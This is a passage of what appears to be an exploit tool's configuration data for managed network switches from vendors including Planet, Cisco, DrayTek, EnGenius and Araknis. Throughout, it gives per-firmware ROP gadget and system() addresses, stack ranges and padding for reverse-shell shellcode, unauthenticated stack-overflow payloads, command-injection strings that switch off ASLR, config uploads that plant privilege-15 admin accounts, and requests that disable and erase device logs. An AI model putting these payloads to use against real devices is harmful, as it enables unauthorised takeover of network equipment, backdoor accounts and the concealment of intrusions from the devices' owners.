'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
'verify_uri':'/tmp/pingtest_tmp',
'web_sys_ping_post':0x4229A0,
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x481988,
'log_ramClear':0x4847FC,
'log_fileClear':0x4847FC,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x42C910,
'sys_timeSntpDel_set':0x42C910,
'sys_timeSettings_set':0x42B6F8,
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',
'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',
'START':0x7fff7004,
'STOP':0x7fc60000,
'usr_nop': 28,
'pwd_nop': 20,
'align': 0,
'stack':True,
'vulnerable': True,
},
},
},
'225-21785': {
'model':'SX-8P',
'template':'Pakedge',
'version':'1.04',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40C86C,
'system': 0x8f998538,
'handler': 0x248492ec,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_log': {
'log_settings_set':0x413AEC,
'log_ramClear':0x413A14,
'log_fileClear':0x413A14,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x4108E4,
'sys_timeSntpDel_set':0x4108E4,
'sys_timeSettings_set':0x4108E4,
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'set.cgi',
'START':0x7ffeff04,
'STOP':0x7fc60000,
'usr_nop': 64,
'pwd_nop': 77,
'align': 3,
'stack':True,
'vulnerable': True,
},
},
},
'752-95168': {
'template':'DrayTek',
'version':'2.1.4',
'model':'VigorSwitch P1100',
'uri':'https://www.draytek.com/products/vigorswitch-p1100/',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40C67C,
'system': 0x8f99852c,
'handler': 0x248490ac,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_log': {
'log_settings_set':0x413E34,
'log_ramClear':0x413D64,
'log_fileClear':0x413D64,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x410CA8,
'sys_timeSntpDel_set':0x410CA8,
'sys_timeSettings_set':0x410CA8,
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'set.cgi',
'START':0x7ffeff04,
'STOP':0x7fc60000,
'usr_nop': 64,
'pwd_nop': 77,
'align': 3,
'stack':True,
'vulnerable': True,
},
},
},
'224-5061': {
'template':'Cerio',
'version':'1.00.29',
'model':'CS-2424G-24P',
'uri':'https://www.cerio.com.tw/eng/switch/poe-switch/cs-2424g-24p/',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40E6DC,
'system': 0x8f998524,
'handler': 0x248411bc,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_diag': {
'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
'sys_ping_post_check':'',
'web_sys_ping_post':0x40E114,
'verify_uri':'/tmp/check',
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x41DB4C,
'log_ramClear':0x41DA94,
'log_fileClear':0x41DA94,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x415F14,
'sys_timeSntpDel_set':0x415F14,
'sys_timeSettings_set':0x415F14,
'vulnerable': False,
},
'heack_cgi_shell': {
'cgi':'set.cgi',
'START':0x7ffeff04,
'STOP':0x7fc60000,
'usr_nop': 64,
'pwd_nop': 77,
'align': 3,
'stack':True,
'vulnerable': True,
},
},
},
'222-45866': {
'template':'Abaniact',
'version':'116B00033',
'model':'AML2-PS16-17GP L2',
'uri':'https://www.abaniact.com/L2SW/',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40E65C,
'system': 0x8f998524,
'handler': 0x2484152c,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_diag': {
'web_sys_ping_post':0x429F58,
'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
'verify_uri':'/tmp/traceroute_tmp',
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x4B4FE4,
'log_ramClear':0x4BA5D0,
'log_fileClear':0x4BA5D0,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x43764C,
'sys_timeSntpDel_set':0x43764C,
'sys_timeSettings_set':0x431CC4,
'vulnerable': False,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',
'query':'username=admin&password=_PWDNOP_RA_START&login=1&shellcod=_USRNOP_USRNOP_USRNOP_SHELLCODE',
'START':0x7ffe6e04,
'STOP':0x7fc60000,
'stack':True,
'usr_nop': 53,
'pwd_nop': 45,
'align': 0,
'vulnerable': True,
'workaround':True,
},
},
},
'222-81176': {
'template':'TG-NET',
'version':'3.1.1-R1',
'model':'P3026M-24POE (V3)',
'uri':'http://www.tg-net.net/productshow.asp?ProdNum=1049&parentid=98',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40C74C,
'system': 0x8f99851c,
'handler': 0x2484a2d4,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_log': {
'log_settings_set':0x46AC10,
'log_ramClear':0x46E368,
'log_fileClear':0x46E368,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x42243C,
'sys_timeSntpDel_set':0x42243C,
'sys_timeSettings_set':0x424DE0,
'vulnerable':False,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',
'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',
'START':0x10010104,
'STOP' :0x10600604,
'usr_nop': 28,
'pwd_nop': 20,
'align': 0,
'stack':False,
'vulnerable': True,
},
},
},
}
Vendor_Template = {
'Planet': {
'vendor': 'PLANET Technology Corp.',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'clear',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=5121',
'status':'',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_5132=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadbakcfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadruncfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httprestorecfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'dispatcher.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username=admin&password='+ self.random_string(184) + '&login=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'md5',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'',
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=526&usrName=USERNAME',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&_CMD_&login=1',
'sys_ping_post_check':'',
'sys_ping_post_SIGSEGV': False,
'workaround':True,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
'log_settings_set_cmd':'&LOGGING_SERVICE=0',
'log_settings_set_SIGSEGV':False,
'log_ramClear_cmd':'',
'log_ramClear_SIGSEGV':False,
'log_fileClear_cmd':'',
'log_fileClear_SIGSEGV':False,
'workaround':True,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',
'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',
'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
'sys_timeSettings_set_SIGSEGV': False,
'workaround':True,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
'workaround':True,
'stack':True,
'vulnerable': True,
'safe': True
},
},
},
'Cisco': {
'vendor': 'Cisco Systems, Inc.',
'model':'Sx220',
'uri':'https://www.cisco.com/c/en/us/support/switches/small-business-220-series-smart-plus-switches/tsd-products-support-series-home.html',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':True,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':True,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_settings',
'disable_query':'{"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_settings',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',
'clean_logfile_query':'{"":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',
'clean_logmem_query':'{"":{}}',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadbakcfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/backup-config',
'content_check':'/mnt/backup-config',
'vulnerable': True,
'safe': True
},
'httpuploadlang.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "language" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadlang.cgi',
'check_uri':False,
'content': self.random_string(30),
'content_check':'errMsgLangMG',
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadruncfg.cgi',
'check_uri':'/tmp/http_saverun_cfg',
'content':'/var/config/running-config',
'content_check':'/var/config/running-config',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httprestorecfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/startup-config',
'content_check':'/mnt/startup-config',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'/tmp/http_uploadfail',
'content':'Copy: Illegal software format',
'content_check':'Copy: Illegal software format',
'vulnerable': True,
'safe': True
},
'login.cgi': {
'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
'authenticated': False,
'response':'file',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'check_uri':'/tmp/VUL.TXT',
'content':'{"_ds=1&username='+ self.random_string(32) +'&password=/tmp/VUL.TXT&_de=1":{}}',
'content_check':'2',
'vulnerable': True,
'safe': True
},
'set.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'md5',
'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_ping_post_SIGSEGV': True,
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'log_settings_set_cmd':'',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',
'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',
'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=123',
'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',
'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True,
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'EnGenius': {
'vendor': 'EnGenius Technologies, Inc.',
'modulus_uri':'',
'info_leak':True,
'info_leak_JSON':False,
'info_leak_uri':'/loginMsg.js',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'',
'disable_query':'',
'status':'',
'clean_logfile_uri':'',
'clean_logfile_query':'',
'clean_logmem_uri':'',
'clean_logmem_query':'',
'vulnerable': False,
'safe': True
},
'verify': {
'security.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/security.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(280),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'datajson.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(288),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/sn_httpupload.cgi?',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'',
'content':'',
'add_uri':'',
'del_query':'',
'del_uri':'',
'vulnerable': False,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'stack_cgi_add_account': {
'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_del_account': {
'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_ping_post_SIGSEGV': True,
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'log_settings_set_cmd':'&en=0',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'&ta=0',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'&ta=1',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',
'sys_timeSettings_set_cmd_enable':'&sn=1',
'sys_timeSettings_set_cmd_disable':'&sn=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/conf_tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/security.cgi?login',
'logout_uri':'/cgi-bin/security.cgi?logout',
'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'Araknis': {
'vendor': 'Araknis Networks',
'modulus_uri':'',
'info_leak':True,
'info_leak_JSON':False,
'info_leak_uri':'/loginMsg.js',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'',
'disable_query':'',
'status':'',
'clean_logfile_uri':'',
'clean_logfile_query':'',
'clean_logmem_uri':'',
'clean_logmem_query':'',
'vulnerable': False,
'safe': True
},
'verify': {
'security.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/security.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(280),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'datajson.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(288),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/sn_httpupload.cgi?',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'',
'content':'',
'add_uri':'',
'del_query':'',
'del_uri':'',
'vulnerable': False,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'stack_cgi_add_account': {
'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_del_account': {
'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
